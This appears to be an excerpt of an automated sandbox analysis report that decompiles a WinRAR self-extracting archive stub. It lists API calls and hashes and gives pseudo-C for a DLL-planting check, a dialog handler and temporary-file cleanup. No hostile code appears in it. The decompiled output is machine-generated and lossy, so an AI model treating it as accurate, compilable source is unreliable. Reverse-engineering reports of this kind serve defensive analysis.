                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDBDAC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CDBDBB
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBE68
                                                    • _wcslen.LIBCMT ref: 00CDBEBE
                                                    • _swprintf.LIBCMT ref: 00CDBEE8
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDBF32
                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CDBF4C
                                                    • GetDlgItem.USER32(?,00000068), ref: 00CDBF55
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CDBF6B
                                                    • GetDlgItem.USER32(?,00000066), ref: 00CDBF85
                                                    • SetWindowTextW.USER32(00000000,00D0A472), ref: 00CDBFA7
                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CDC007
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC01A
                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CDC0BD
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00CDC197
                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CDC1D9
                                                      • Part of subcall function 00CDC73F: __EH_prolog.LIBCMT ref: 00CDC744
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDC1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                    • API String ID: 581453772-311033401
                                                    • Opcode ID: 22321d13e834dd6ac3be0aff27d4d179e10d990a075cb19fffe87c9ecb25695d
                                                    • Instruction ID: b02bda95bf7c78da842c67a684774b6dcab831cf87a6c31d76e57226e2214bea
                                                    • Opcode Fuzzy Hash: 22321d13e834dd6ac3be0aff27d4d179e10d990a075cb19fffe87c9ecb25695d
                                                    • Instruction Fuzzy Hash: DE42F470944349BAEB21AB60DC8AFBE776CAB11700F00405AF758E63D2CB749E45EB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 268 cd0863-cd0886 call cdec50 GetModuleHandleW 271 cd0888-cd089f GetProcAddress 268->271 272 cd08e7-cd0b48 268->272 273 cd08b9-cd08c9 GetProcAddress 271->273 274 cd08a1-cd08b7 271->274 275 cd0b4e-cd0b59 call ce75fb 272->275 276 cd0c14-cd0c40 GetModuleFileNameW call ccc29a call cd0602 272->276 277 cd08cb-cd08e0 273->277 278 cd08e5 273->278 274->273 275->276 286 cd0b5f-cd0b8d GetModuleFileNameW CreateFileW 275->286 292 cd0c42-cd0c4e call ccb146 276->292 277->278 278->272 287 cd0b8f-cd0b9b SetFilePointer 286->287 288 cd0c08-cd0c0f CloseHandle 286->288 287->288 290 cd0b9d-cd0bb9 ReadFile 287->290 288->276 290->288 294 cd0bbb-cd0be0 290->294 297 cd0c7d-cd0ca4 call ccc310 GetFileAttributesW 292->297 298 cd0c50-cd0c5b call cd081b 292->298 296 cd0bfd-cd0c06 call cd0371 294->296 296->288 305 cd0be2-cd0bfc call cd081b 296->305 308 cd0cae 297->308 309 cd0ca6-cd0caa 297->309 298->297 307 cd0c5d-cd0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cd0cb0-cd0cb5 308->312 309->292 311 cd0cac 309->311 311->312 313 cd0cec-cd0cee 312->313 314 cd0cb7 312->314 315 cd0dfb-cd0e05 313->315 316 cd0cf4-cd0d0b call ccc2e4 call ccb146 313->316 317 cd0cb9-cd0ce0 call ccc310 GetFileAttributesW 314->317 327 cd0d0d-cd0d6e call cd081b * 2 call cce617 call cc4092 call cce617 call cda7e4 316->327 328 cd0d73-cd0da6 call cc4092 AllocConsole 316->328 322 cd0cea 317->322 323 cd0ce2-cd0ce6 317->323 322->313 323->317 325 cd0ce8 323->325 325->313 334 cd0df3-cd0df5 ExitProcess 327->334 333 cd0da8-cd0ded GetCurrentProcessId AttachConsole call ce3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                    C-Code - Quality: 72%
                                                    			E00CD0863(void* __edx, char _a3, long _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t111;
				int _t122;
				long _t133;
				void* _t149;
				_Unknown_base(*)()* _t168;
				struct _OVERLAPPED* _t174;
				struct _OVERLAPPED* _t175;
				signed char _t176;
				_Unknown_base(*)()* _t177;
				struct _OVERLAPPED* _t189;
				long _t190;
				void* _t191;
				_Unknown_base(*)()* _t192;
				struct HINSTANCE__* _t193;
				signed int _t195;
				struct _OVERLAPPED* _t196;
				signed int _t197;
				void* _t198;
				_Unknown_base(*)()* _t199;
				signed int _t200;
				int _t201;
				void* _t202;

				E00CDEC50(0xb3cc);
				_t174 = 0;
				_a3 = 0;
				_t193 = GetModuleHandleW(L"kernel32");
				if(_t193 != 0) {
					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
					_t176 = _a46032;
					_t192 = _t168;
					if(_t192 != 0) {
						asm("sbb ecx, ecx");
						_t177 = _t192;
						 *0xcf3278( ~(_t176 & 0x000000ff) & 0x00cf35f4);
						 *_t192();
					}
					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
					if(_t199 != 0) {
						_t177 = _t199;
						 *0xcf3278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
						 *_t199();
						_v1 = 1;
					}
					_t174 = 0;
				}
				_t111 =  *0xcfe1a4; // 0xcf3c2c
				_t201 = _t200 | 0xffffffff;
				_a8 = L"version.dll";
				_t194 = 0x800;
				_a12 = L"DXGIDebug.dll";
				_a16 = L"sfc_os.dll";
				_a20 = L"SSPICLI.DLL";
				_a24 = L"rsaenh.dll";
				_a28 = L"UXTheme.dll";
				_a32 = L"dwmapi.dll";
				_a36 = L"cryptbase.dll";
				_a40 = L"lpk.dll";
				_a44 = L"usp10.dll";
				_a48 = L"clbcatq.dll";
				_a52 = L"comres.dll";
				_a56 = L"ws2_32.dll";
				_a60 = L"ws2help.dll";
				_a64 = L"psapi.dll";
				_a68 = L"ieframe.dll";
				_a72 = L"ntshrui.dll";
				_a76 = L"atl.dll";
				_a80 = L"setupapi.dll";
				_a84 = L"apphelp.dll";
				_a88 = L"userenv.dll";
				_a92 = L"netapi32.dll";
				_a96 = L"shdocvw.dll";
				_a100 = L"crypt32.dll";
				_a104 = L"msasn1.dll";
				_a108 = L"cryptui.dll";
				_a112 = L"wintrust.dll";
				_a116 = L"shell32.dll";
				_a120 = L"secur32.dll";
				_a124 = L"cabinet.dll";
				_a128 = L"oleaccrc.dll";
				_a132 = L"ntmarta.dll";
				_a136 = L"profapi.dll";
				_a140 = L"WindowsCodecs.dll";
				_a144 = L"srvcli.dll";
				_a148 = L"cscapi.dll";
				_a152 = L"slc.dll";
				_a156 = L"imageres.dll";
				_a160 = L"dnsapi.DLL";
				_a164 = L"iphlpapi.DLL";
				_a168 = L"WINNSI.DLL";
				_a172 = L"netutils.dll";
				_a176 = L"mpr.dll";
				_a180 = L"devrtl.dll";
				_a184 = L"propsys.dll";
				_a188 = L"mlang.dll";
				_a192 = L"samcli.dll";
				_a196 = L"samlib.dll";
				_a200 = L"wkscli.dll";
				_a204 = L"dfscli.dll";
				_a208 = L"browcli.dll";
				_a212 = L"rasadhlp.dll";
				_a216 = L"dhcpcsvc6.dll";
				_a220 = L"dhcpcsvc.dll";
				_a224 = L"XmlLite.dll";
				_a228 = L"linkinfo.dll";
				_a232 = L"cryptsp.dll";
				_a236 = L"RpcRtRemote.dll";
				_a240 = L"aclui.dll";
				_a244 = L"dsrole.dll";
				_a248 = L"peerdist.dll";
				if( *_t111 == 0x78) {
					L15:
					GetModuleFileNameW(_t174,  &_a772, _t194);
					E00CD0602( &_a9160, E00CCC29A(_t215,  &_a772), _t194);
					_t189 = _t174;
					do {
						_t195 = _t174;
						if(E00CCB146() < 0x600) {
							L19:
							_t196 =  *(_t202 + 0x18 + _t195 * 4);
							_push(0x800);
							E00CCC310(_t218,  &_a772, _t196);
							_t122 = GetFileAttributesW( &_a760); // executed
							if(_t122 != _t201) {
								_t189 = _t196;
								L23:
								if(_v1 != 0) {
									L29:
									_t225 = _t189;
									if(_t189 == 0) {
										return _t122;
									}
									E00CCC2E4(_t225,  &_a768);
									if(E00CCB146() < 0x600) {
										_push( &_a9160);
										_push( &_a768);
										E00CC4092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
										_t202 = _t202 + 0x18;
										_t122 = AllocConsole();
										__eflags = _t122;
										if(_t122 != 0) {
											__imp__AttachConsole(GetCurrentProcessId());
											_t133 = E00CE3E13( &_a4860);
											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
											Sleep(0x2710);
											_t122 = FreeConsole();
										}
									} else {
										E00CD081B(L"dwmapi.dll");
										E00CD081B(L"uxtheme.dll");
										_push( &_a9152);
										_push( &_a760);
										E00CC4092( &_a4852, 0x864, E00CCE617(0xf1), _t189);
										_t202 = _t202 + 0x18;
										_t122 = E00CDA7E4(0,  &_a4848, E00CCE617(0xf0), 0x30);
									}
									ExitProcess(0);
								}
								_t197 = 0;
								while(1) {
									_t175 =  *(_t202 + 0x38 + _t197 * 4);
									_push(0x800);
									E00CCC310(0,  &_a768, _t175);
									_t122 = GetFileAttributesW( &_a756);
									if(_t122 != _t201) {
										break;
									}
									_t197 = _t197 + 1;
									if(_t197 < 0x35) {
										continue;
									}
									goto L29;
								}
								_t189 = _t175;
								goto L29;
							}
							goto L20;
						}
						_t149 = E00CD081B( *(_t202 + 0x18 + _t195 * 4)); // executed
						if(_t149 == 0) {
							goto L19;
						}
						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
						_t218 = _t122 - 2;
						if(_t122 != 2) {
							goto L20;
						}
						goto L19;
						L20:
						_t174 =  &(_t174->Internal);
					} while (_t174 < 8);
					goto L23;
				} else {
					_t190 = E00CE75FB(_t177, _t111);
					if(_t190 == 0) {
						goto L15;
					}
					GetModuleFileNameW(_t174,  &_a4868, 0x800);
					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190 || ReadFile(_t198,  &_a13260, 0x7ffe,  &_a4, _t174) == 0) {
						L14:
						CloseHandle(_t198);
						_t194 = 0x800;
						goto L15;
					} else {
						_push(0x104);
						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t191 = E00CD0371();
							_t215 = _t191;
							if(_t191 == 0) {
								goto L14;
							}
							E00CD081B( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t191);
						}
						goto L14;
					}
				}
			}



























                                                    0x00cd0868
                                                    0x00cd0871
                                                    0x00cd0878
                                                    0x00cd0882
                                                    0x00cd0886
                                                    0x00cd088e
                                                    0x00cd0894
                                                    0x00cd089b
                                                    0x00cd089f
                                                    0x00cd08a6
                                                    0x00cd08af
                                                    0x00cd08b1
                                                    0x00cd08b7
                                                    0x00cd08b7
                                                    0x00cd08c5
                                                    0x00cd08c9
                                                    0x00cd08d6
                                                    0x00cd08d8
                                                    0x00cd08de
                                                    0x00cd08e0
                                                    0x00cd08e0
                                                    0x00cd08e5
                                                    0x00cd08e5
                                                    0x00cd08e7
                                                    0x00cd08ec
                                                    0x00cd08ef
                                                    0x00cd08f7
                                                    0x00cd08fc
                                                    0x00cd0904
                                                    0x00cd090f
                                                    0x00cd0917
                                                    0x00cd091f
                                                    0x00cd0927
                                                    0x00cd092f
                                                    0x00cd0937
                                                    0x00cd093f
                                                    0x00cd0947
                                                    0x00cd094f
                                                    0x00cd0957
                                                    0x00cd095f
                                                    0x00cd0967
                                                    0x00cd096f
                                                    0x00cd0977
                                                    0x00cd097f
                                                    0x00cd0987
                                                    0x00cd098f
                                                    0x00cd0997
                                                    0x00cd099f
                                                    0x00cd09a7
                                                    0x00cd09af
                                                    0x00cd09b7
                                                    0x00cd09bf
                                                    0x00cd09c7
                                                    0x00cd09d2
                                                    0x00cd09dd
                                                    0x00cd09e8
                                                    0x00cd09f3
                                                    0x00cd09fe
                                                    0x00cd0a09
                                                    0x00cd0a14
                                                    0x00cd0a1f
                                                    0x00cd0a2a
                                                    0x00cd0a35
                                                    0x00cd0a40
                                                    0x00cd0a4b
                                                    0x00cd0a56
                                                    0x00cd0a61
                                                    0x00cd0a6c
                                                    0x00cd0a77
                                                    0x00cd0a82
                                                    0x00cd0a8d
                                                    0x00cd0a98
                                                    0x00cd0aa3
                                                    0x00cd0aae
                                                    0x00cd0ab9
                                                    0x00cd0ac4
                                                    0x00cd0acf
                                                    0x00cd0ada
                                                    0x00cd0ae5
                                                    0x00cd0af0
                                                    0x00cd0afb
                                                    0x00cd0b06
                                                    0x00cd0b11
                                                    0x00cd0b1c
                                                    0x00cd0b27
                                                    0x00cd0b32
                                                    0x00cd0b3d
                                                    0x00cd0b48
                                                    0x00cd0c14
                                                    0x00cd0c1e
                                                    0x00cd0c3b
                                                    0x00cd0c40
                                                    0x00cd0c42
                                                    0x00cd0c42
                                                    0x00cd0c4e
                                                    0x00cd0c7d
                                                    0x00cd0c7d
                                                    0x00cd0c88
                                                    0x00cd0c8f
                                                    0x00cd0c9c
                                                    0x00cd0ca4
                                                    0x00cd0cae
                                                    0x00cd0cb0
                                                    0x00cd0cb5
                                                    0x00cd0cec
                                                    0x00cd0cec
                                                    0x00cd0cee
                                                    0x00cd0e05
                                                    0x00cd0e05
                                                    0x00cd0cfc
                                                    0x00cd0d0b
                                                    0x00cd0d7a
                                                    0x00cd0d82
                                                    0x00cd0d96
                                                    0x00cd0d9b
                                                    0x00cd0d9e
                                                    0x00cd0da4
                                                    0x00cd0da6
                                                    0x00cd0daf
                                                    0x00cd0dc4
                                                    0x00cd0ddc
                                                    0x00cd0de7
                                                    0x00cd0ded
                                                    0x00cd0ded
                                                    0x00cd0d0d
                                                    0x00cd0d12
                                                    0x00cd0d1c
                                                    0x00cd0d28
                                                    0x00cd0d30
                                                    0x00cd0d4a
                                                    0x00cd0d4f
                                                    0x00cd0d69
                                                    0x00cd0d69
                                                    0x00cd0df5
                                                    0x00cd0df5
                                                    0x00cd0cb7
                                                    0x00cd0cb9
                                                    0x00cd0cb9
                                                    0x00cd0cc4
                                                    0x00cd0ccb
                                                    0x00cd0cd8
                                                    0x00cd0ce0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0ce2
                                                    0x00cd0ce6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0ce8
                                                    0x00cd0cea
                                                    0x00000000
                                                    0x00cd0cea
                                                    0x00000000
                                                    0x00cd0ca4
                                                    0x00cd0c54
                                                    0x00cd0c5b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0c72
                                                    0x00cd0c78
                                                    0x00cd0c7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0ca6
                                                    0x00cd0ca6
                                                    0x00cd0ca7
                                                    0x00000000
                                                    0x00cd0b4e
                                                    0x00cd0b54
                                                    0x00cd0b59
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0b69
                                                    0x00cd0b89
                                                    0x00cd0b8d
                                                    0x00cd0c08
                                                    0x00cd0c09
                                                    0x00cd0c0f
                                                    0x00000000
                                                    0x00cd0bbb
                                                    0x00cd0bc3
                                                    0x00cd0bc8
                                                    0x00cd0bd7
                                                    0x00cd0bdf
                                                    0x00cd0bfd
                                                    0x00cd0c02
                                                    0x00cd0c04
                                                    0x00cd0c06
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd0bea
                                                    0x00cd0bef
                                                    0x00cd0bfb
                                                    0x00cd0bfc
                                                    0x00cd0bfc
                                                    0x00000000
                                                    0x00cd0bfd
                                                    0x00cd0b8d

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0B69
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD0B83
                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD0B93
                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00CF3C7C,00000000), ref: 00CD0BB1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CD0C09
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CD0C1E
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CF3C7C,?,00000000,?,00000800), ref: 00CD0C72
                                                    • GetFileAttributesW.KERNELBASE(?,?,00CF3C7C,00000800,?,00000000,?,00000800), ref: 00CD0C9C
                                                    • GetFileAttributesW.KERNEL32(?,?,00CF3D44,00000800), ref: 00CD0CD8
                                                      • Part of subcall function 00CD081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CD0836
                                                      • Part of subcall function 00CD081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CCF2D8,Crypt32.dll,00000000,00CCF35C,?,?,00CCF33E,?,?,?), ref: 00CD0858
                                                    • _swprintf.LIBCMT ref: 00CD0D4A
                                                    • _swprintf.LIBCMT ref: 00CD0D96
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • AllocConsole.KERNEL32 ref: 00CD0D9E
                                                    • GetCurrentProcessId.KERNEL32 ref: 00CD0DA8
                                                    • AttachConsole.KERNEL32(00000000), ref: 00CD0DAF
                                                    • _wcslen.LIBCMT ref: 00CD0DC4
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CD0DD5
                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00CD0DDC
                                                    • Sleep.KERNEL32(00002710), ref: 00CD0DE7
                                                    • FreeConsole.KERNEL32 ref: 00CD0DED
                                                    • ExitProcess.KERNEL32 ref: 00CD0DF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                    • API String ID: 1207345701-3298887752
                                                    • Opcode ID: 5198745560befb8d3bd8a3ba3f2fc43649cdd94e9e65e698d67d808b4147560c
                                                    • Instruction ID: 88fac597f94b39c890bacd6e7a90e1782c3308493ea4fed0ef081fe67e66b801
                                                    • Opcode Fuzzy Hash: 5198745560befb8d3bd8a3ba3f2fc43649cdd94e9e65e698d67d808b4147560c
                                                    • Instruction Fuzzy Hash: 09D152F14183C8BBDB659F54C849BAFBBE8AF85704F50491EF38596250CBB08649CB63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 347 cdc73f-cdc757 call cdeb78 call cdec50 352 cdd40d-cdd418 347->352 353 cdc75d-cdc787 call cdb314 347->353 353->352 356 cdc78d-cdc792 353->356 357 cdc793-cdc7a1 356->357 358 cdc7a2-cdc7b7 call cdaf98 357->358 361 cdc7b9 358->361 362 cdc7bb-cdc7d0 call cd1fbb 361->362 365 cdc7dd-cdc7e0 362->365 366 cdc7d2-cdc7d6 362->366 368 cdd3d9-cdd404 call cdb314 365->368 369 cdc7e6 365->369 366->362 367 cdc7d8 366->367 367->368 368->357 384 cdd40a-cdd40c 368->384 370 cdc7ed-cdc7f0 369->370 371 cdca7c-cdca7e 369->371 372 cdca5f-cdca61 369->372 373 cdc9be-cdc9c0 369->373 370->368 377 cdc7f6-cdc850 call cda64d call ccbdf3 call cca544 call cca67e call cc6edb 370->377 371->368 375 cdca84-cdca8b 371->375 372->368 379 cdca67-cdca77 SetWindowTextW 372->379 373->368 376 cdc9c6-cdc9d2 373->376 375->368 380 cdca91-cdcaaa 375->380 381 cdc9d4-cdc9e5 call ce7686 376->381 382 cdc9e6-cdc9eb 376->382 438 cdc98f-cdc9a4 call cca5d1 377->438 379->368 385 cdcaac 380->385 386 cdcab2-cdcac0 call ce3e13 380->386 381->382 389 cdc9ed-cdc9f3 382->389 390 cdc9f5-cdca00 call cdb48e 382->390 384->352 385->386 386->368 402 cdcac6-cdcacf 386->402 394 cdca05-cdca07 389->394 390->394 399 cdca09-cdca10 call ce3e13 394->399 400 cdca12-cdca32 call ce3e13 call ce3e3e 394->400 399->400 421 cdca4b-cdca4d 400->421 422 cdca34-cdca3b 400->422 406 cdcaf8-cdcafb 402->406 407 cdcad1-cdcad5 402->407 412 cdcb01-cdcb04 406->412 414 cdcbe0-cdcbee call cd0602 406->414 411 cdcad7-cdcadf 407->411 407->412 411->368 417 cdcae5-cdcaf3 call cd0602 411->417 419 cdcb06-cdcb0b 412->419 420 cdcb11-cdcb2c 412->420 430 cdcbf0-cdcc04 call ce279b 414->430 417->430 419->414 419->420 433 cdcb2e-cdcb68 420->433 434 cdcb76-cdcb7d 420->434 421->368 429 cdca53-cdca5a call ce3e2e 421->429 427 cdca3d-cdca3f 422->427 428 cdca42-cdca4a call ce7686 422->428 427->428 428->421 429->368 448 cdcc06-cdcc0a 430->448 449 cdcc11-cdcc62 call cd0602 call cdb1be GetDlgItem SetWindowTextW SendMessageW call ce3e49 430->449 469 cdcb6c-cdcb6e 433->469 470 cdcb6a 433->470 440 cdcb7f-cdcb97 call ce3e13 434->440 441 cdcbab-cdcbce call ce3e13 * 2 434->441 455 cdc9aa-cdc9b9 call cca55a 438->455 456 cdc855-cdc869 SetFileAttributesW 438->456 440->441 463 cdcb99-cdcba6 call cd05da 440->463 441->430 475 cdcbd0-cdcbde call cd05da 441->475 448->449 454 cdcc0c-cdcc0e 448->454 481 cdcc67-cdcc6b 449->481 454->449 455->368 458 cdc90f-cdc91f GetFileAttributesW 456->458 459 cdc86f-cdc8a2 call ccb991 call ccb690 call ce3e13 456->459 458->438 467 cdc921-cdc930 DeleteFileW 458->467 490 cdc8b5-cdc8c3 call ccbdb4 459->490 491 cdc8a4-cdc8b3 call ce3e13 459->491 463->441 467->438 474 cdc932-cdc935 467->474 469->434 470->469 478 cdc939-cdc965 call cc4092 GetFileAttributesW 474->478 475->430 488 cdc937-cdc938 478->488 489 cdc967-cdc97d MoveFileW 478->489 481->368 485 cdcc71-cdcc85 SendMessageW 481->485 485->368 488->478 489->438 492 cdc97f-cdc989 MoveFileExW 489->492 490->455 497 cdc8c9-cdc908 call ce3e13 call cdfff0 490->497 491->490 491->497 492->438 497->458
                                                    C-Code - Quality: 58%
                                                    			E00CDC73F(void* __edx, void* __edi) {
				intOrPtr _t232;
				void* _t237;
				intOrPtr _t293;
				intOrPtr _t297;
				long _t308;
				void* _t311;
				signed int _t312;
				void* _t316;

				E00CDEB78(0xcf2b20, _t316);
				_t232 = E00CDEC50(0x1b888);
				if( *((intOrPtr*)(_t316 + 0xc)) == 0) {
					L180:
					 *[fs:0x0] =  *((intOrPtr*)(_t316 - 0xc));
					return _t232;
				}
				_push(0x1000);
				_push(_t316 - 0x15);
				_push(_t316 - 0xd);
				_push(_t316 - 0x588c);
				_push(_t316 - 0xf894);
				_push( *((intOrPtr*)(_t316 + 0xc)));
				_t232 = E00CDB314(__edi, _t316);
				_t297 = _t232;
				 *((intOrPtr*)(_t316 + 0xc)) = _t297;
				if(_t297 != 0) {
					_t293 =  *((intOrPtr*)(_t316 + 0x10));
					_push(__edi);
					do {
						_t237 = _t316 - 0x588c;
						_t311 = _t316 - 0x1b894;
						_t308 = 6;
						goto L4;
						L6:
						while(E00CD1FBB(_t316 - 0xf894,  *((intOrPtr*)(0xcfe744 + _t312 * 4))) != 0) {
							_t312 = _t312 + 1;
							if(_t312 < 0xe) {
								continue;
							} else {
								goto L178;
							}
						}
						if(_t312 > 0xd) {
							goto L178;
						}
						switch( *((intOrPtr*)(_t312 * 4 +  &M00CDD41B))) {
							case 0:
								__eflags = _t293 - 2;
								if(_t293 == 2) {
									_t308 = 0x800;
									E00CDA64D(_t316 - 0x788c, 0x800);
									E00CCA544(E00CCBDF3(__eflags, _t316 - 0x788c, _t316 - 0x588c, _t316 - 0xd894, 0x800), _t293, _t316 - 0x8894, _t312);
									 *(_t316 - 4) = 0;
									E00CCA67E(_t316 - 0x8894, _t316 - 0xd894);
									E00CC6EDB(_t316 - 0x388c);
									while(1) {
										_push(0);
										_t255 = E00CCA5D1(_t316 - 0x8894, _t316 - 0x388c);
										__eflags = _t255;
										if(_t255 == 0) {
											break;
										}
										SetFileAttributesW(_t316 - 0x388c, 0);
										__eflags =  *(_t316 - 0x2880);
										if(__eflags == 0) {
											L18:
											_t259 = GetFileAttributesW(_t316 - 0x388c);
											__eflags = _t259 - 0xffffffff;
											if(_t259 == 0xffffffff) {
												continue;
											}
											_t261 = DeleteFileW(_t316 - 0x388c);
											__eflags = _t261;
											if(_t261 != 0) {
												continue;
											} else {
												_t314 = 0;
												_push(0);
												goto L22;
												L22:
												E00CC4092(_t316 - 0x1044, _t308, L"%s.%d.tmp", _t316 - 0x388c);
												_t318 = _t318 + 0x14;
												_t266 = GetFileAttributesW(_t316 - 0x1044);
												__eflags = _t266 - 0xffffffff;
												if(_t266 != 0xffffffff) {
													_t314 = _t314 + 1;
													__eflags = _t314;
													_push(_t314);
													goto L22;
												} else {
													_t269 = MoveFileW(_t316 - 0x388c, _t316 - 0x1044);
													__eflags = _t269;
													if(_t269 != 0) {
														MoveFileExW(_t316 - 0x1044, 0, 4);
													}
													continue;
												}
											}
										}
										E00CCB991(__eflags, _t316 - 0x788c, _t316 - 0x1044, _t308);
										E00CCB690(__eflags, _t316 - 0x1044, _t308);
										_t315 = E00CE3E13(_t316 - 0x788c);
